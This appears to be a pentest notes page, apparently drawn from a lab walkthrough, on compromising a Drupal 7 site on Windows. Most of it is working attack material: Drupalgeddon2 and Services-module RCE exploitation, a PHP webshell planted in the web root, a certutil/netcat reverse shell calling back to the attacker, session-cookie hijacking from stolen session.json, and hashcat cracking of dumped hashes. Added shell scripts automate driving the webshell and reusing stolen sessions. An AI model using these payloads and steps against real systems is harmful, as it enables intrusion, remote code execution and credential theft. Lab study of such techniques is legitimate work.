# Drupal

* [https://www.drupal.org](https://www.drupal.org/)
* Open-source web content management framework written in PHP

## Scan

```
nmap -sC -sV -oA output 10.x.x.x

80     IIS 7.5, Drupal    ..Windows 2008 R2
135    msrpc
49154  msrpc

DirBuster: /rest/  ..200 (a REST endpoint; matters for the Services exploit below)

http://10.x.x.x  ..Drupal
```

## drupscan

* Works, but too old (last updated around 2013)
* github/tibillys

## droopescan

* Takes a long time to run
* http://$IP/CHANGELOG.txt  ..find the version: the first "Drupal X.Y, date" header is the running release
* http://$IP/robots.txt

```
droopescan --help
droopescan scan drupal -u 10.x.x.x

version: 7.54            ..interesting result
Admin: login page found  ..but droopescan lists no exploits
Theme: seven
Modules: ctools, libraries, image
```

## drupalgeddon (msf)

* Metasploit module: `exploit/unix/webapp/drupal_drupalgeddon2`

```
searchsploit drupal 7.5   ..the term also matches the "< 7.58" Drupalgeddon2 entries
```

## drupalgeddon (no msf)

* CVE-2018-7600 (Drupalgeddon2, SA-CORE-2018-002): fixed in 7.58 / 8.3.9 / 8.4.6 / 8.5.1, so 7.54 is affected
* <https://github.com/dreadlocked/Drupalgeddon2> (ruby)
* If you only get a 'limited shell' (each command is a separate HTTP request), host nc.exe on an HTTP server on the attack box, pull it with certutil and call back for a proper reverse shell

```
gem install highline
ruby drupalgeddon2.rb http://10.x.x.x/

nc -nvlp 4444                                       ..attack box listener
certutil -urlcache -split -f http://$MyIP/nc.exe    ..on target: fetch nc.exe from the attack box web server
nc.exe -e cmd.exe $MyIP 4444                        ..on target: call back
```

## Serialization Vulnerability - 41564.php (Services module)

* EDB-ID 41564: Drupal 7.x Services module unserialize() RCE; it needs the Services REST endpoint, which is why the /rest hit from DirBuster matters
* Search for and download the PHP exploit; it requires php-curl
* ippsec adds custom phpCode to the exploit for:
  * uploading files to the target
  * executing commands
* The exploit also writes user.json and session.json locally; they can hold secrets

```
google drupal 7.54 exploits  ..found one
searchsploit drupal          ..found the 7.x Services exploit
searchsploit -x 41564.php    ..view
searchsploit -p 41564.php    ..print full path (and copy to clipboard if xclip is installed)
mv 41564.php drupal.php      ..move/rename

Confirm the REST endpoint:
http://10.x.x.x/rest_endpoint  ..nothing (the exploit's default path)
http://10.x.x.x/rest           ..ok (this target)
```

```
$url = 'http://10.x.x.x/';
// $endpoint_path = '/rest_endpoint';   // exploit default: wrong for this target
$endpoint_path = '/rest';               // found by DirBuster

// 'EOD' is a nowdoc: nothing is interpolated, so write the attack box IP
// literally where $MyIP stands below.
$phpCode = <<<'EOD'
<?php
  // fupload=<name>: fetch <name> from the attack box (HTTP server on port 8000)
  // and write it next to this webshell
  if (isset($_REQUEST['fupload'])) {
    file_put_contents($_REQUEST['fupload'], file_get_contents("http://$MyIP:8000/" . $_REQUEST['fupload']));
  }
  // fexec=<cmd>: run <cmd> and return its output wrapped in <pre>
  if (isset($_REQUEST['fexec'])) {
    echo "<pre>" . shell_exec($_REQUEST['fexec']) . "</pre>";
  }
?>
EOD;

// file the exploit writes into the target's web root
$file = [
    'filename' => 'ippsec.php',
    'data'     => $phpCode
];
```

```
Exploit:
> php drupal.php   ..drops ippsec.php on the target, writes user.json and session.json locally
```

## JSON Cookies

* The exploit saves user.json and session.json locally
* user.json: uid, name, mail and the password hash ($S$... is a Drupal 7 hash, hashcat mode 7900), not a cleartext password
* session.json: session_name and session_id of a logged-in session; set them as a cookie in the browser and you get that user's session, which might be admin

```
cat user.json      ..user details / password hash
cat session.json   ..session_name + session_id

firefox > Cookies Manager+ (addon) > New Cookie
  Name:    <session_name>   e.g. SESSxyz111
  Content: <session_id>     e.g. ddddd
  Host:    10.x.x.x
<save>
http://10.x.x.x/   ..we are admin!!
```
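Added example (not the page's notes and not part of 41564.php): a sh helper that reads the session.json and user.json the exploit drops, builds the Cookie header for curl instead of pasting into Cookies Manager+, and pulls the password hash out for hashcat. The two JSON files below are constructed in the shape the notes describe (session_name/session_id; uid/name/pass); the key names are assumed to match what the exploit writes.

```shell
#!/bin/sh
# Added example, not part of the original notes or the 41564.php exploit.
# Turns session.json / user.json into (a) a Cookie header for curl and
# (b) a hashcat-ready Drupal 7 hash. Sample files are constructed.

SESSION_JSON="$(mktemp)"
USER_JSON="$(mktemp)"
# PHP's json_encode writes "/" as "\/", which is why the hash below carries one.
printf '%s\n' '{"session_name":"SESSd873f26d","session_id":"abc123def456","token":"tok"}' > "$SESSION_JSON"
printf '%s\n' '{"uid":"1","name":"admin","pass":"$S$DtestHashWith\/Slash","mail":"admin@example.com"}' > "$USER_JSON"

# Pull a string value out of a flat JSON object without jq; tolerates whitespace
# around the colon and undoes the "\/" escaping.
json_str() {   # json_str <file> <key>
  sed -n "s/.*\"$2\"[[:space:]]*:[[:space:]]*\"\([^\"]*\)\".*/\1/p" "$1" | head -n 1 | sed 's#\\/#/#g'
}

# Drupal names the session cookie after session_name; its value is session_id.
cookie_from_session_json() {
  printf '%s=%s\n' "$(json_str "$1" session_name)" "$(json_str "$1" session_id)"
}

# Drupal 7 password hashes start with $S$ (hashcat mode 7900).
hash_from_user_json() {
  json_str "$1" pass
}

# Usage against the target: reuse the stolen session and check who we are.
#   curl -s -b "$(cookie_from_session_json session.json)" "http://$IP/?q=user"
# Crack the hash offline:
#   hash_from_user_json user.json > drupal.hash
#   hashcat -m 7900 drupal.hash wordlist.txt
echo "Cookie: $(cookie_from_session_json "$SESSION_JSON")"
echo "Hash:   $(hash_from_user_json "$USER_JSON")"
```

The sed-based extractor is enough for the flat one-line objects the exploit writes; for anything nested use jq.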

## Drupal PHP Filter Module

* With admin access to Drupal 7:
  * Enable the PHP filter module (part of core in Drupal 7; removed from core in Drupal 8)
  * Create an article whose body is PHP and set its text format to PHP code

```
Drupal > Modules > PHP filter (enable) > Save configuration
Add content > Article
Title:       test
Body:        <?php phpinfo(); ?>
Text format: PHP code
Preview   ..phpinfo() renders: we have code execution!
```

## Webshell

* Use the ippsec phpCode dropped by the exploit (ippsec.php in the web root)
* fexec runs a command; fupload (e.g. `ippsec.php?fupload=nc.exe`) pulls a file from the attack box HTTP server on port 8000
* Commands containing &, # or + must be URL-encoded or the query string gets cut

```
http://10.x.x.x/ippsec.php?fexec=dir
http://10.x.x.x/ippsec.php?fexec=systeminfo
http://10.x.x.x/ippsec.php?fexec=sc query state=all   ..access denied
```

## Enumeration

* **systeminfo** gives the OS version, build and patch level
* "Hotfix(s): N/A" means either no hotfixes are installed or our account cannot read them; on an RTM build it usually means unpatched
* OS version and build are what you match a kernel exploit against

```
OS Version:  6.1.7600 N/A Build 7600   ..6.1 = Windows 7 / Server 2008 R2; 7600 = RTM (7601 would be SP1)
Hotfix(s):   N/A                       ..no patches listed
Kernel exploit                         ..pick one for this build
```
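Added example (not part of the original notes) covering the two sections above: a sh driver for the ippsec.php webshell that URL-encodes the command (so `sc query state=all` and anything with `&` or `#` survive the query string) and strips the `<pre>` wrapper, plus a parser for the two systeminfo lines the enumeration keys on. The webshell name and parameters (ippsec.php, fexec, fupload) are the ones the notes use; the systeminfo output below is constructed and English-locale output is assumed.

```shell
#!/bin/sh
# Added example, not part of the original notes. Drives the ippsec.php webshell
# and parses the systeminfo it returns. Sample systeminfo output is constructed.

# Percent-encode every byte that is not unreserved, so spaces, '=', '&', '#'
# and '+' in a command reach PHP intact. ASCII commands assumed.
urlencode() {
  s="$1"
  while [ -n "$s" ]; do
    c="${s%"${s#?}"}"      # first character
    s="${s#?}"
    case "$c" in
      [A-Za-z0-9._~-]) printf '%s' "$c" ;;
      *) printf '%%%02X' "'$c" ;;   # "'x" makes printf yield x's character code
    esac
  done
  echo
}

# Remove the <pre>...</pre> the fexec branch of the webshell wraps output in.
strip_pre() {
  sed -e 's/^<pre>//' -e 's#</pre>$##'
}

# ws_exec <base-url> <command>: run a command through the webshell.
ws_exec() {
  curl -s "$1/ippsec.php?fexec=$(urlencode "$2")" | strip_pre
}

# ws_upload <base-url> <filename>: make the webshell fetch <filename> from the
# attack box HTTP server on port 8000 (start it with: python3 -m http.server 8000).
ws_upload() {
  curl -s "$1/ippsec.php?fupload=$(urlencode "$2")"
}

# Constructed sample of what ws_exec "$URL" systeminfo returns before strip_pre.
SAMPLE_SYSTEMINFO='<pre>Host Name:                 TARGET
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
Hotfix(s):                 N/A</pre>'

# Build number from "OS Version: 6.1.7600 N/A Build 7600" (stdin).
win_build() {
  sed -n 's/^OS Version:.*Build \([0-9][0-9]*\).*/\1/p' | head -n 1
}

# Whatever follows "Hotfix(s):" (stdin): "N/A" or "<n> Hotfix(s) Installed."
hotfix_line() {
  sed -n 's/^Hotfix(s):[[:space:]]*//p' | head -n 1
}

# 7600 is the 6.1 RTM build and 7601 is SP1: RTM plus "Hotfix(s): N/A" is an
# unpatched box, which is what points at a kernel exploit.
win_build_name() {
  case "$1" in
    7600) echo "Windows 7 / Server 2008 R2 RTM (no service pack)" ;;
    7601) echo "Windows 7 / Server 2008 R2 SP1" ;;
    *)    echo "unknown build $1" ;;
  esac
}

# One-line summary of raw webshell systeminfo output (stdin).
summarize_systeminfo() {
  out="$(strip_pre)"
  build="$(printf '%s\n' "$out" | win_build)"
  hf="$(printf '%s\n' "$out" | hotfix_line)"
  printf 'build=%s hotfixes=%s (%s)\n' "$build" "$hf" "$(win_build_name "$build")"
}

# Live usage:  ws_exec "http://$IP" systeminfo | summarize_systeminfo
printf '%s\n' "$SAMPLE_SYSTEMINFO" | summarize_systeminfo
```

ws_exec and ws_upload need a reachable target; the encoder and the parsers run offline on the sample above.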

